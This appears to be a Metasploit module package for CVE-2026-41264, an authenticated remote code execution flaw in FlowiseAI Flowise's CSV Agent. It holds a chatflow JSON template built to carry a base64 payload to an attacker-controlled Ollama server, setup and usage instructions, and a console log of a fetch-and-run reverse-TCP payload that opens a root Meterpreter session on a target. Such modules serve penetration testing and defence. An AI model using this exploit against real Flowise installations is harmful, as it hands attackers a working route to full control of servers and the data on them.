data/exploits/CVE-2026-41264/cve_2026_41264.json (7 additions, 0 deletions)
{
"name": "__NAME__",
"flowData": "{\"nodes\":[{\"id\":\"csvAgent_0\",\"position\":{\"x\":795,\"y\":248},\"type\":\"customNode\",\"data\":{\"id\":\"csvAgent_0\",\"label\":\"CSV Agent\",\"version\":3,\"name\":\"csvAgent\",\"type\":\"AgentExecutor\",\"baseClasses\":[\"AgentExecutor\",\"BaseChain\",\"Runnable\"],\"category\":\"Agents\",\"description\":\"Agent used to answer queries on CSV data\",\"inputParams\":[{\"label\":\"Csv File\",\"name\":\"csvFile\",\"type\":\"file\",\"fileType\":\".csv\",\"id\":\"csvAgent_0-input-csvFile-file\",\"display\":true},{\"label\":\"System Message\",\"name\":\"systemMessagePrompt\",\"type\":\"string\",\"rows\":4,\"additionalParams\":true,\"optional\":true,\"placeholder\":\"I want you to act as a document that I am having a conversation with. Your name is \\\"AI Assistant\\\". You will provide me with answers from the given info. If the answer is not included, say exactly \\\"Hmm, I am not sure.\\\" and stop after that. Refuse to answer any question not about the info. Never break character.\",\"id\":\"csvAgent_0-input-systemMessagePrompt-string\",\"display\":true},{\"label\":\"Custom Pandas Read_CSV Code\",\"description\":\"Custom Pandas <a target=\\\"_blank\\\" href=\\\"https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.read_csv.html\\\">read_csv</a> function. 
Takes in an input: \\\"csv_data\\\"\",\"name\":\"customReadCSV\",\"default\":\"read_csv(csv_data)\",\"type\":\"code\",\"optional\":true,\"additionalParams\":true,\"id\":\"csvAgent_0-input-customReadCSV-code\",\"display\":true}],\"inputAnchors\":[{\"label\":\"Language Model\",\"name\":\"model\",\"type\":\"BaseLanguageModel\",\"id\":\"csvAgent_0-input-model-BaseLanguageModel\",\"display\":true},{\"label\":\"Input Moderation\",\"description\":\"Detect text that could generate harmful output and prevent it from being sent to the language model\",\"name\":\"inputModeration\",\"type\":\"Moderation\",\"optional\":true,\"list\":true,\"id\":\"csvAgent_0-input-inputModeration-Moderation\",\"display\":true}],\"inputs\":{\"model\":\"{{ollama_0.data.instance}}\",\"systemMessagePrompt\":\"\",\"inputModeration\":\"\",\"customReadCSV\":\"read_csv(csv_data)\",\"csvFile\":\"data:text/csv;base64,__PAYLOAD__,filename:__FILENAME__\"},\"outputAnchors\":[{\"id\":\"csvAgent_0-output-csvAgent-AgentExecutor|BaseChain|Runnable\",\"name\":\"csvAgent\",\"label\":\"AgentExecutor\",\"description\":\"Agent used to answer queries on CSV data\",\"type\":\"AgentExecutor | BaseChain | Runnable\"}],\"outputs\":{},\"selected\":false},\"width\":300,\"height\":470,\"selected\":true,\"dragging\":false,\"positionAbsolute\":{\"x\":795,\"y\":248}},{\"id\":\"ollama_0\",\"position\":{\"x\":352.1404559232181,\"y\":217.87567356209098},\"type\":\"customNode\",\"data\":{\"id\":\"ollama_0\",\"label\":\"Ollama\",\"version\":2,\"name\":\"ollama\",\"type\":\"Ollama\",\"baseClasses\":[\"Ollama\",\"LLM\",\"BaseLLM\",\"BaseLanguageModel\",\"Runnable\"],\"category\":\"LLMs\",\"description\":\"Wrapper around open source large language models on Ollama\",\"inputParams\":[{\"label\":\"Base URL\",\"name\":\"baseUrl\",\"type\":\"string\",\"default\":\"__OLLAMAAPIURI__\",\"id\":\"ollama_0-input-baseUrl-string\",\"display\":true},{\"label\":\"Model 
Name\",\"name\":\"modelName\",\"type\":\"string\",\"placeholder\":\"llama2\",\"id\":\"ollama_0-input-modelName-string\",\"display\":true},{\"label\":\"Temperature\",\"name\":\"temperature\",\"type\":\"number\",\"description\":\"The temperature of the model. Increasing the temperature will make the model answer more creatively. (Default: 0.8). Refer to <a target=\\\"_blank\\\" href=\\\"https://github.com/jmorganca/ollama/blob/main/docs/modelfile.md#valid-parameters-and-values\\\">docs</a> for more details\",\"step\":0.1,\"default\":0.9,\"optional\":true,\"id\":\"ollama_0-input-temperature-number\",\"display\":true},{\"label\":\"Top P\",\"name\":\"topP\",\"type\":\"number\",\"description\":\"Works together with top-k. A higher value (e.g., 0.95) will lead to more diverse text, while a lower value (e.g., 0.5) will generate more focused and conservative text. (Default: 0.9). Refer to <a target=\\\"_blank\\\" href=\\\"https://github.com/jmorganca/ollama/blob/main/docs/modelfile.md#valid-parameters-and-values\\\">docs</a> for more details\",\"step\":0.1,\"optional\":true,\"additionalParams\":true,\"id\":\"ollama_0-input-topP-number\",\"display\":true},{\"label\":\"Top K\",\"name\":\"topK\",\"type\":\"number\",\"description\":\"Reduces the probability of generating nonsense. A higher value (e.g. 100) will give more diverse answers, while a lower value (e.g. 10) will be more conservative. (Default: 40). Refer to <a target=\\\"_blank\\\" href=\\\"https://github.com/jmorganca/ollama/blob/main/docs/modelfile.md#valid-parameters-and-values\\\">docs</a> for more details\",\"step\":1,\"optional\":true,\"additionalParams\":true,\"id\":\"ollama_0-input-topK-number\",\"display\":true},{\"label\":\"Mirostat\",\"name\":\"mirostat\",\"type\":\"number\",\"description\":\"Enable Mirostat sampling for controlling perplexity. (default: 0, 0 = disabled, 1 = Mirostat, 2 = Mirostat 2.0). 
Refer to <a target=\\\"_blank\\\" href=\\\"https://github.com/jmorganca/ollama/blob/main/docs/modelfile.md#valid-parameters-and-values\\\">docs</a> for more details\",\"step\":1,\"optional\":true,\"additionalParams\":true,\"id\":\"ollama_0-input-mirostat-number\",\"display\":true},{\"label\":\"Mirostat ETA\",\"name\":\"mirostatEta\",\"type\":\"number\",\"description\":\"Influences how quickly the algorithm responds to feedback from the generated text. A lower learning rate will result in slower adjustments, while a higher learning rate will make the algorithm more responsive. (Default: 0.1) Refer to <a target=\\\"_blank\\\" href=\\\"https://github.com/jmorganca/ollama/blob/main/docs/modelfile.md#valid-parameters-and-values\\\">docs</a> for more details\",\"step\":0.1,\"optional\":true,\"additionalParams\":true,\"id\":\"ollama_0-input-mirostatEta-number\",\"display\":true},{\"label\":\"Mirostat TAU\",\"name\":\"mirostatTau\",\"type\":\"number\",\"description\":\"Controls the balance between coherence and diversity of the output. A lower value will result in more focused and coherent text. (Default: 5.0) Refer to <a target=\\\"_blank\\\" href=\\\"https://github.com/jmorganca/ollama/blob/main/docs/modelfile.md#valid-parameters-and-values\\\">docs</a> for more details\",\"step\":0.1,\"optional\":true,\"additionalParams\":true,\"id\":\"ollama_0-input-mirostatTau-number\",\"display\":true},{\"label\":\"Context Window Size\",\"name\":\"numCtx\",\"type\":\"number\",\"description\":\"Sets the size of the context window used to generate the next token. 
(Default: 2048) Refer to <a target=\\\"_blank\\\" href=\\\"https://github.com/jmorganca/ollama/blob/main/docs/modelfile.md#valid-parameters-and-values\\\">docs</a> for more details\",\"step\":1,\"optional\":true,\"additionalParams\":true,\"id\":\"ollama_0-input-numCtx-number\",\"display\":true},{\"label\":\"Number of GQA groups\",\"name\":\"numGqa\",\"type\":\"number\",\"description\":\"The number of GQA groups in the transformer layer. Required for some models, for example it is 8 for llama2:70b. Refer to <a target=\\\"_blank\\\" href=\\\"https://github.com/jmorganca/ollama/blob/main/docs/modelfile.md#valid-parameters-and-values\\\">docs</a> for more details\",\"step\":1,\"optional\":true,\"additionalParams\":true,\"id\":\"ollama_0-input-numGqa-number\",\"display\":true},{\"label\":\"Number of GPU\",\"name\":\"numGpu\",\"type\":\"number\",\"description\":\"The number of layers to send to the GPU(s). On macOS it defaults to 1 to enable metal support, 0 to disable. Refer to <a target=\\\"_blank\\\" href=\\\"https://github.com/jmorganca/ollama/blob/main/docs/modelfile.md#valid-parameters-and-values\\\">docs</a> for more details\",\"step\":1,\"optional\":true,\"additionalParams\":true,\"id\":\"ollama_0-input-numGpu-number\",\"display\":true},{\"label\":\"Number of Thread\",\"name\":\"numThread\",\"type\":\"number\",\"description\":\"Sets the number of threads to use during computation. By default, Ollama will detect this for optimal performance. It is recommended to set this value to the number of physical CPU cores your system has (as opposed to the logical number of cores). 
Refer to <a target=\\\"_blank\\\" href=\\\"https://github.com/jmorganca/ollama/blob/main/docs/modelfile.md#valid-parameters-and-values\\\">docs</a> for more details\",\"step\":1,\"optional\":true,\"additionalParams\":true,\"id\":\"ollama_0-input-numThread-number\",\"display\":true},{\"label\":\"Repeat Last N\",\"name\":\"repeatLastN\",\"type\":\"number\",\"description\":\"Sets how far back for the model to look back to prevent repetition. (Default: 64, 0 = disabled, -1 = num_ctx). Refer to <a target=\\\"_blank\\\" href=\\\"https://github.com/jmorganca/ollama/blob/main/docs/modelfile.md#valid-parameters-and-values\\\">docs</a> for more details\",\"step\":1,\"optional\":true,\"additionalParams\":true,\"id\":\"ollama_0-input-repeatLastN-number\",\"display\":true},{\"label\":\"Repeat Penalty\",\"name\":\"repeatPenalty\",\"type\":\"number\",\"description\":\"Sets how strongly to penalize repetitions. A higher value (e.g., 1.5) will penalize repetitions more strongly, while a lower value (e.g., 0.9) will be more lenient. (Default: 1.1). Refer to <a target=\\\"_blank\\\" href=\\\"https://github.com/jmorganca/ollama/blob/main/docs/modelfile.md#valid-parameters-and-values\\\">docs</a> for more details\",\"step\":0.1,\"optional\":true,\"additionalParams\":true,\"id\":\"ollama_0-input-repeatPenalty-number\",\"display\":true},{\"label\":\"Stop Sequence\",\"name\":\"stop\",\"type\":\"string\",\"rows\":4,\"placeholder\":\"AI assistant:\",\"description\":\"Sets the stop sequences to use. Use comma to seperate different sequences. Refer to <a target=\\\"_blank\\\" href=\\\"https://github.com/jmorganca/ollama/blob/main/docs/modelfile.md#valid-parameters-and-values\\\">docs</a> for more details\",\"optional\":true,\"additionalParams\":true,\"id\":\"ollama_0-input-stop-string\",\"display\":true},{\"label\":\"Tail Free Sampling\",\"name\":\"tfsZ\",\"type\":\"number\",\"description\":\"Tail free sampling is used to reduce the impact of less probable tokens from the output. 
A higher value (e.g., 2.0) will reduce the impact more, while a value of 1.0 disables this setting. (Default: 1). Refer to <a target=\\\"_blank\\\" href=\\\"https://github.com/jmorganca/ollama/blob/main/docs/modelfile.md#valid-parameters-and-values\\\">docs</a> for more details\",\"step\":0.1,\"optional\":true,\"additionalParams\":true,\"id\":\"ollama_0-input-tfsZ-number\",\"display\":true}],\"inputAnchors\":[{\"label\":\"Cache\",\"name\":\"cache\",\"type\":\"BaseCache\",\"optional\":true,\"id\":\"ollama_0-input-cache-BaseCache\",\"display\":true}],\"inputs\":{\"cache\":\"\",\"baseUrl\":\"__OLLAMAAPIURI__\",\"modelName\":\"__MODELNAME__\",\"temperature\":0.9,\"topP\":\"\",\"topK\":\"\",\"mirostat\":\"\",\"mirostatEta\":\"\",\"mirostatTau\":\"\",\"numCtx\":\"\",\"numGqa\":\"\",\"numGpu\":\"\",\"numThread\":\"\",\"repeatLastN\":\"\",\"repeatPenalty\":\"\",\"stop\":\"\",\"tfsZ\":\"\"},\"outputAnchors\":[{\"id\":\"ollama_0-output-ollama-Ollama|LLM|BaseLLM|BaseLanguageModel|Runnable\",\"name\":\"ollama\",\"label\":\"Ollama\",\"description\":\"Wrapper around open source large language models on Ollama\",\"type\":\"Ollama | LLM | BaseLLM | BaseLanguageModel | Runnable\"}],\"outputs\":{},\"selected\":false},\"width\":300,\"height\":586,\"selected\":false,\"positionAbsolute\":{\"x\":352.1404559232181,\"y\":217.87567356209098},\"dragging\":false}],\"edges\":[{\"source\":\"ollama_0\",\"sourceHandle\":\"ollama_0-output-ollama-Ollama|LLM|BaseLLM|BaseLanguageModel|Runnable\",\"target\":\"csvAgent_0\",\"targetHandle\":\"csvAgent_0-input-model-BaseLanguageModel\",\"type\":\"buttonedge\",\"id\":\"ollama_0-ollama_0-output-ollama-Ollama|LLM|BaseLLM|BaseLanguageModel|Runnable-csvAgent_0-csvAgent_0-input-model-BaseLanguageModel\"}],\"viewport\":{\"x\":384.43132370461996,\"y\":-150.62729892561072,\"zoom\":0.794291033198883}}",
"deployed": false,
"isPublic": false,
"type": "CHATFLOW"
}
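The template above carries the placeholders `__NAME__`, `__OLLAMAAPIURI__`, `__MODELNAME__`, `__FILENAME__`, and `__PAYLOAD__` (the CSV file is embedded as a base64 data URI). A minimal sketch of how a client might fill them before submitting the chatflow — the helper name and the `data.csv` filename are illustrative, not the module's actual implementation:

```python
import base64
import json


def fill_template(template: str, name: str, ollama_uri: str,
                  model: str, csv_payload: bytes) -> dict:
    """Substitute the template placeholders and parse the result.

    Base64 output and plain URIs contain no quote characters, so the
    substitutions keep both the outer JSON and the escaped flowData
    string inside it well-formed.
    """
    filled = (
        template
        .replace("__NAME__", name)
        .replace("__OLLAMAAPIURI__", ollama_uri)
        .replace("__MODELNAME__", model)
        .replace("__FILENAME__", "data.csv")  # illustrative filename
        .replace("__PAYLOAD__", base64.b64encode(csv_payload).decode())
    )
    return json.loads(filled)
```

After substitution the resulting dict can be serialized and posted to the Flowise API as the chatflow body.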
## Vulnerable Application

This vulnerability allows remote attackers to execute arbitrary code on affected installations of FlowiseAI Flowise.
A valid Flowise API key is required to exploit this vulnerability.

The specific flaw exists within the `run` method of the `CSV_Agents` class.
The issue results from the lack of proper sandboxing when evaluating an LLM-generated Python script.
An attacker can leverage this vulnerability to execute code in the context of the user running the server.
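The dangerous pattern can be illustrated with a minimal stand-in (this is not Flowise's code): when a user- or LLM-supplied snippet is evaluated without a sandbox, any Python expression — not just the intended `read_csv()` call — runs with the server's privileges.

```python
def run_custom_read_csv(custom_code: str, csv_data: str):
    """Evaluate a user-supplied 'Custom Pandas Read_CSV Code' field.

    Illustrative stand-in for the vulnerable pattern: eval() on
    attacker-controlled input, with builtins still reachable.
    """
    def read_csv(data):  # stand-in for pandas.read_csv
        return [row.split(",") for row in data.splitlines()]

    # Vulnerable: no sandbox, so arbitrary expressions execute.
    return eval(custom_code, {"read_csv": read_csv, "csv_data": csv_data})


# Intended use: parse the CSV.
run_custom_read_csv("read_csv(csv_data)", "a,b\n1,2")
# Abuse: the same entry point reaches the OS.
run_custom_read_csv("__import__('os').getpid()", "")
```

Because Python's `eval` silently injects the real builtins when the globals dict omits `__builtins__`, `__import__` remains reachable and the snippet escalates to full code execution.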

The vulnerability affects:

* flowise <= 3.0.13
* flowise-components <= 3.0.13

This module was successfully tested on:

* flowise 3.0.13 installed with Docker


### Installation
1. `docker run --name flowise -p 3000:3000 flowiseai/flowise:3.0.13`

2. On the attacker machine, install Ollama and pull a model:
```
curl -fsSL https://ollama.com/install.sh | sh
ollama run llama3.1
```
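Before running the module it can help to confirm the Ollama endpoint is reachable from the target's perspective. A small stdlib-only check (the helper name is ours; `GET /api/tags` is Ollama's model-listing endpoint):

```python
import json
import urllib.request


def ollama_reachable(base_url: str) -> bool:
    """Return True if an Ollama server answers at base_url.

    GET /api/tags lists locally installed models and responds with a
    JSON object containing a "models" key.
    """
    try:
        with urllib.request.urlopen(f"{base_url.rstrip('/')}/api/tags",
                                    timeout=5) as resp:
            return "models" in json.load(resp)
    except (OSError, ValueError):
        return False
```

For example, `ollama_reachable("http://192.168.56.1:11434")` should return `True` once `ollama run llama3.1` has been started.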


## Verification Steps

1. Install the application
2. Start msfconsole
3. Do: `use exploit/multi/http/flowise_auth_rce_cve_2026_41264`
4. Do: `run lhost=<lhost> rhost=<rhost> apikey=<apikey> ollamaapiuri=<ollamaapiuri> model=<model>`
5. You should get a Meterpreter session


## Options

### APIKEY (required)

The Flowise API key used to authenticate requests to the Flowise API.

### OLLAMAAPIURI (required)

Endpoint of the attacker-controlled Ollama API (e.g. `http://192.168.56.1:11434`).

### MODEL (required)

Name of a model available on the attacker's Ollama server (e.g. `llama3.1`).
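Together, these options drive an authenticated chatflow-creation request. A sketch of how that request could be assembled with the stdlib — the `/api/v1/chatflows` endpoint and the Bearer-token scheme follow Flowise's public API documentation, but verify both against your target version:

```python
import json
import urllib.request


def build_chatflow_request(rhost: str, rport: int, apikey: str,
                           chatflow: dict) -> urllib.request.Request:
    """Build the authenticated 'create chatflow' POST request.

    Assumptions: Flowise exposes POST /api/v1/chatflows and accepts the
    API key as a Bearer token. Send the result with
    urllib.request.urlopen(req).
    """
    return urllib.request.Request(
        f"http://{rhost}:{rport}/api/v1/chatflows",
        data=json.dumps(chatflow).encode(),
        headers={
            "Content-Type": "application/json",
            "Authorization": f"Bearer {apikey}",
        },
        method="POST",
    )
```

On success Flowise returns the stored chatflow including its generated `id`, which is what a prediction request would subsequently target.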


## Scenarios

### cmd/linux/http/x64/meterpreter_reverse_tcp
```
msf > use exploit/multi/http/flowise_auth_rce_cve_2026_41264.rb
[*] Using configured payload cmd/linux/http/x64/meterpreter_reverse_tcp
msf exploit(multi/http/flowise_auth_rce_cve_2026_41264) > options

Module options (exploit/multi/http/flowise_auth_rce_cve_2026_41264):

Name Current Setting Required Description
---- --------------- -------- -----------
APIKEY yes Flowise API Key
MODEL yes Valid ollama model name
OLLAMAAPIURI yes Endpoint of the OLLAMA API controlled by an attacker
Proxies no A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: http, socks5, socks5h, sapni, socks4
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 3000 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
VHOST no HTTP server virtual host


Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE true yes Attempt to delete the binary after execution
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8, tested shells are sh, bash, zsh) (Accepted: none, python3.8+, shell-search, shell)
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port


When FETCH_COMMAND is one of CURL,GET,WGET:

Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.


When FETCH_FILELESS is none:

Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME rEMNcqUnjzT no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces


Exploit target:

Id Name
-- ----
0 Linux Command



View the full module info with the info, or info -d command.

msf exploit(multi/http/flowise_auth_rce_cve_2026_41264) > run apikey=<apikey> rhost=192.168.56.17 lhost=192.168.56.1 ollamaapiuri=http://192.168.56.1:11434 model=llama3.1
[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Flowise version 3.0.13 detected
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.17:45382) at 2026-05-05 13:45:41 +0900

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer : acc229b14e46
OS : (Linux 6.8.0-52-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter >
```